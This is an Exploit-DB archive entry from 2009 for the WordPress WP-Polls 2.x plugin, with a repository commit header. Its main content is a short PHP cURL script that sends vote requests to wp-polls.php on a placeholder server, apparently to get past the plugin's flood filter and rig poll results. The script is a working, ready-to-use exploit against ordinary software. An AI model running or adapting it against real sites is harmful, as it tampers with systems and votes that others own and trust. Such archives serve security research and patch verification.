exploit-db-mirror/exploits/php/webapps/10256.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
560 B
Text

# Exploit Title: WP-Polls 2.x Incorrect Flood Filter
# Date: 30/11/2009
# Author: Jbyte (jbyte-security.blogspot.com)
# Software Link: http://lesterchan.net/wordpress/readme/wp-polls.html
# Version: 2.x
# Tested on: Windows 7/windows xp/ ubuntu 9.04/ ubuntu 9.10
# Code :
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://server/wp-content/plugins/wp-polls/wp-polls.php");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,"vote=true&poll_id=ID survey here&poll_7=ID to vote here");
curl_exec($ch);
curl_close($ch);
?>